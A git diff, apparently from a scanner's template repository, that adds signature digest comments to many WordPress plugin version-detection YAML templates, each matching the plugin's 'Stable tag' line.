a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..2e23ab92a2 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206a17d309fe65a146d87fec1fb3e8204dc9725fffca16e87be044e9fee763c9d80220760bf15bbe844609f78706b925981dc6e7a61c0fa98de6dbf507338e5aeed188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..0e87dec0bc 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022014fca11dbecd3f7b100f0ee382f48a258e6620bf6d8e4aede2a9b6cb4b8741590220196017535cae218a4b9d08ddd3a4147dc9d702e6ccf7eec2f319ddd12dda46d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..e7362fe954 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d8ee19df4c8204503bc2a348842c19566f82db08da6034627d7140e0d6ed5cf022100f69e7fbb43b98b294090f93733755cf3a40c27a5c450373aaf6d8fc970a15995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..7009bdd5d5 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050a2336cde0de8b90755b475eec4a4e1ec5436094af3e10a485df154f597f8030221008bbde5a57055a6769224a450c5e4addb79e22a644f2522258461b34635ee684e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..dce76d8d05 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100afaee136b00909658f93a9654e1b52dbe3f022ec3be3eda24d60b65b744bbc6902206b8aba2cd3403c74744f6343ec7c9cc97c80cc4be7da482f653ba877ecc96fa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..c7c6d91cc5 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bc5aed774d1b2128b49d0e0d36ea2a681d021d52bcabffe6f96557b6ff90be82022100a9ee86dbdfaa7ea4ee3704c13298b6598c778ee09eba80ca98afd6677b02df5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..eb0d512bb0 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e640093dfad085aba8706b2eaaf56d48e0fbb65b5a9216a72a6c0c00e32bb11e02207167fe0f44166fba090e20f3275616b869db062995e72492e74099c0da366973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..95e297b0f3 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bf322e116c69e52eeddf83eef48535cecfd75743ee125fe55470d883198c6901022100de0dffd6fbcecd2012624b1e26f089fe5a0c62aa6a1dbe43da11e52cdbb42ec6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..2767a41fdd 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022062ea563957d3ebdb3915c01b997421e0a7b56eb7aed0925d64baca5f72d28f81022100d5c9fec46f4742c882262a70a6075ab02e557224df2e84c28244d8980c57c4cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..b7d68ba8fc 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e527c54b09a9c85bcc1d9646ece627dc06e53e6025bf6deb43211e3489f6910b022069c28b97daf15a7cfd24a1cc397519f733b4adb887484f4cc01adc99db51392f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..92dc8a24ee 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cded7a6dd50ce10ff543b385429a3d010030e356d4c049a962f0a9fa91a0ed5402200904f1af7b3c0bf12619e408ee89def82d2bddcf378719a1296513274f5314bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..f182a9a5f5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aa6eff4d1ddce1aa616ec1480df1e9cc35311f785d42d613105a3bacfa4579e0022100a6dc602e3cc81bd99ff3f5d6159ecfd5e61fff79bb820c2935e5dcb361675598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..8caa226535 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c16d40d27c810683d8328feae8ed100fb945ee9bf64c298df29699dea4f061730221009993b93fb31d3bb0cd730aa4efce52e14b8673f1aa2baccbbc327b1e716025c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..afe03072ec 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c3cd48a95ab83c80de60f8de08e2829b28f48f743fe1edd8c181122ba0a91ce022046f5e3d8dfef4eb8f13ba3959b2e1787bc50762b481eac39f244efe2ed8b2d76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..b3d6557e06 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d2fdb0b30cead328a1c292367cddb89ae90515493470a90473a83301e345a4e02200d941c45d0f369da569685371becf9a07abefc8f324cd4afdaed555a8b7625b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..ce072b1c26 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fc8a75093f07bf6233fbe3ae49f4e214793dd38c56450e8ca6ca4acd2152011a022074a18d76919015f1b344cc020b8cff53515bf2035d33fb28eebe4091376bda05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..5d1eb7f17f 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100de713f07660712ec249fe950c892c05c5edbb71f5b554ad3a89a46066efed221022100b25b325b99046fca924c77e3428da07f77ec423c455a0736cd6184fc21a74022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..4352910609 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae1c9cfc46fe67685209dd83e408c477bea61e8c228ad5df7044e2656414191d02210080440b044961b2460d8e1f16020a47bf208697282d9eee2e0f650da0e3634cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..b64caaf551 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210099fb8af200be4f19b9efb355afd80862f49415b4f981e10e062690fc372ccf7d02210081705debfcbcfb27debdc689b9328a5245df12b0b45620691b78b97320149ba1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..7c589eb897 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207a3fba997522b6375dc01ae816d5d7575740fb1c436db732e461e79851dff343022100aba982ab399e74e2f9ac443422662f5d27e1847ea4bc775101f8a3a33968e223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..4508433059 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026ce863e3324a4530f1379f3b2bbdb2c5201830d0d29307f796def7d9123bdae02204d3ae38938d8bc022057301b31709a51b4290178d0aae1d12fa90277ff9652c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..0d8a329ad3 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a49856814a72669370590435c3cce675878e49bb1fd477b7f2fd7bf6c4b9d77902205315b7cd369b634b3f67aab145b430a7f9c38604e8e8906a6b8336de106d01ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..b572df769b 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c53a143a27ee5f9bb174ecb258f3b1dfcb432090ffd01f68dd2c651a1059d2cd0221009b938b89e7a8e84f646900991872cd1c8bb4a851c6be995e817edf826be236c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..755cd94ccb 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e33f45deb93ed806a76b8484eeef63e2ffdab143f5bd0d19cfc35cf66df9044e022100a06e3464bbd0de4761176863ebe504cfe8a8cbbd30c709ea7a56fbf312414dc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..52b2ca5877 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008b26f3f2a4cf5d7c62f7dd74121bc248aac56394e7958c00f62ae5f08799b316022100cc9770d4e195a2b2e984110dc4282c2396eeeeddf8a763af7c19470e00c5f429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..35b28c695b 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049aaf0c410287898b6d7d68a3fda16a05cec83e9c8887de7adb98c0d2f04717a022100fdb233303c88927044c21dfc722f4399d72bfa522f8e6991033efa485b04f8d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..e60bc265b0 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b91a284fadf501c3990d9c2a4ed75ea587d5fed5f70eff5987a4df07acd58ed1022100cfe02ec841e4b4e4e3f33d7148bab76098598f64a0aea3dbbf9670818bc1a724:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..c0e722d69d 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022062c08108b72141ccb5c5960e374d4f8dab2834ea5e45bc5181301e5aa4470732022100b3e69801a6f9fbd767393908b570e6ec7fa4440b79fcca8b294def7b6f0dedbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..e6dbdec837 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009cc88a9680889ee4645b3326724679e1422c1b63546a164f8e60a3a97081d01e022100f737cc2bb321a79f51abf82168ab025c375059a042a0904cfedfcb456e57e80a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..c04752385b 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220597af304614da3b5ea4808e52945576ecc212604609394b80bdb10453c01f8db02205778b897b7c832f0824040ffb2978b166bb9f3de4f11f1a3fbf87b4cbc928423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..e6c325eade 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022002e454bcc44eb30b8e8781d9457f0f92353d3ea31981ea6347e31c7c67e7f2550220193e71c0aa78577be88ed347e04e45de9fbbcf2d6d4896f84dc3827b024d6076:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..f0aa1af82c 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100984642a6c35ef84be236f7371dc398138530db536083f2a4f641a9deae903f450220699621aabb1ef4fc60bad4508bf01619fcb72637c9b20f5f65a23a20f9f00a4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..d56e92d4d1 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002959b79058c85afb41192a06327cfc41a09b783dbc60bdd2aae8024cfe82011022100f92b5bee2ecdbd12bd55b1f99013be094e48ec9f9fe6c889d50bbe2c177833b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..f5d929a6b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092c6c381245565f352b96727fa734ecc0fd419af126a98ead4c0f7d5a863dc9f02207a8133f22e8924b88720d41303280e2d4568df1e75d0fc6ced0b46af39915888:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..515b217cc0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d8f289c141d45919a85496f04fe8bef243b446b33cd56c2e5ca2674e91afb9400221008e776c6bc31308c168abf38bf9f8379a26707ae47eb814652cfcba2697b143b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..1487ca23ed 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025ac351ec5554bdb0aa5dfddf80de32bc87d58a5fcd0a12c3598c60641dbf78e022100f01f567a81d50ed6d6435e5f04c69df6d4854c3cdda96ff00e41f3cf8c44b4b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index f7c9ef9b1f..ceff76e48d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b3ec6d2964f88e8dbf1a455fa41628b4945eca89a7fbdb3cc4a8dbdea4e5c711022060d54c1bf9286a2d0df16cb684610b2465cb0b7b48dc696c2a825e93fd11fef2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..3662a68149 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a97e680f8334376e9ebf356e9ef829590c5fbc8cd476e849bf03ce868f72980a022074108a41d43b9c6063dd965fda853381ff14eb008d51f19924bc857ff82ec9f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..217a935429 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f751842d04149f68081817645d436cc17dd7c66900fbacda03388b29afc2e7802205bb63194d52517bc17eadf5efa83acf36381ff18ac04f553e1986eaff1147ac4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..06bcecd5e8 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb7facb11729d5321eb1a0d75c65b3d5cc2243bfe469cf65f6cf9b38670bc738022054d492d44ab1bd3af4064aae52f41db0aa3988850e0d572e14d26f5d866bf0f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..d19bf2a7e7 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008ae84bdf9a8ccc7afb911c5f48381e214df601b5ceda32d56782f9a8d8117c1e02201ed775687e89a1d81ff4a51f1ceb382f9762025cd5e2648e084f9081b4715643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..2ac9a4f05f 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204e0ec20c406e5b99781814fef52f59cd56823f3b33544dec9f7db8819986521a022100a806ea477d9b029688e0e6b222193db09547d46cd113cfcaa6b394cfaaea747d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..67f5008ba2 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fbd89c951ef81a025382d46ea36e3f1d9ace97a29e7ee03a6f1be7b39d002a36022100df99e65f5bdd3fb5276aab35c879174da5c2941cc0161f6dffa226473778cdaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..8810e44ee7 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c5a21bd2ccdd4a3166b1b5bc6bdecb02c03c2164321e2b1c45caf6833658188a0220169cc3b1265ef0578959e884ce51051e4dd023a0d16f1b0059fb533938a5b079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-crontrol.yaml b/http/technologies/wordpress/plugins/wp-crontrol.yaml index a773829b7d..56b40b84ba 100644 --- a/http/technologies/wordpress/plugins/wp-crontrol.yaml +++ b/http/technologies/wordpress/plugins/wp-crontrol.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200cffb161a5a96db652c5e3f954a587603b34bc229bdc5f6d6c30bb0dacdfee06022100894e6a619caf66a2f14c10a2beafa546efbeb8db88f62239fece444dee0087e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..40a8c1b6d7 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220195396fba8d266836461944854121821bb7ba9e60d9f5e569f6ada512558a8d402205861df8943f11cf6f19b310ff80e5eaf4507c5acd76b306a7951e3129900918f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..fdf34e0bbe 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml 